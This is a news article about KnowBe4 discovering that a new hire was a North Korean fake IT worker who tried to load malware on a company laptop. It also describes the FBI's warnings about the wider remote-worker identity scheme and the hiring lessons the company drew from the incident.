KnowBe4 faced malware threat after unknowingly hiring North Korean hacker
FLORIDA, UNITED STATES — KnowBe4, a prominent security awareness training company, recently revealed that it had unknowingly hired a North Korean hacker. The hacker attempted to load malware into the company’s network immediately upon receiving their work-issued laptop.
This incident, detailed by CEO Stu Sjouwerman in a blog post, serves as a cautionary tale for businesses worldwide.
Deceptive hiring process
The hacker, posing as a software engineer, used a stolen U.S. identity and an AI-enhanced photo to pass KnowBe4’s rigorous hiring process. This included multiple rounds of video interviews and thorough background checks.
“First of all: No illegal access was gained, and no data was lost, compromised, or exfiltrated on any KnowBe4 systems,” Sjouwerman assured in his post.
“This is not a data breach notification, there was none. See it as an organizational learning moment I am sharing with you. If it can happen to us, it can happen to almost anyone. Don’t let it happen to you.”
Immediate detection and response
The incident was discovered on July 15, 2024, when KnowBe4’s Security Operations Center (SOC) detected suspicious activities from the new hire’s workstation. The SOC team quickly contacted the individual who claimed to be troubleshooting a router issue.
However, further investigation revealed that the hacker was manipulating session history files, transferring potentially harmful files, and executing unauthorized software using a Raspberry Pi.
KnowBe4’s SOC team promptly contained the compromised device and shared their findings with cybersecurity firm Mandiant and the Federal Bureau of Investigation (FBI). “We shared the collected data with our friends at Mandiant, a leading global cybersecurity expert, and the FBI, to corroborate our initial findings. It turns out this was a fake IT worker from North Korea,” Sjouwerman wrote.
Warning against North Korea’s IT worker scheme
Last year, the FBI advised U.S. employers to exercise caution when hiring remote IT workers. This warning came after uncovering a scheme where North Korean IT workers infiltrated American companies using fake identities.
Authorities estimate that hundreds of IT workers were involved, secretly sending millions of dollars in wages back to North Korea to help fund its weapons program. Using video chat services, they interviewed and obtained remote jobs under fake names with U.S. companies, often paying Americans to let them use their home Wi-Fi to appear located in the U.S.
Just last May, federal authorities arrested two individuals in connection with a sophisticated scheme that enabled North Korean IT workers to secure remote positions at over 300 U.S. companies using stolen identities.
The scheme compromised the identities of more than 60 U.S. citizens and affected over 300 companies, generating at least $6.8 million in revenue for the North Korean government, which was funneled back to support its weapons programs.
Lessons learned and future precautions
The incident underscores the sophistication of modern cyber threats and the importance of robust identity verification measures. KnowBe4 is enhancing its hiring processes to include more thorough validation of identities and training staff to recognize red flags.
“If it can happen to us, it can happen to almost anyone,” Sjouwerman emphasized. “It’s good we have new employees in a highly restricted area when they start, and have no access to production systems. Our controls caught it, but that was sure a learning moment that I am happy to share with everyone.”
This incident highlights the critical need for continuous security monitoring and improved coordination between HR, IT, and security teams to protect against advanced persistent threats.
As remote work becomes more prevalent, companies must adopt robust measures to ensure the authenticity of their hires and safeguard their organizations from fraud and cyber threats.
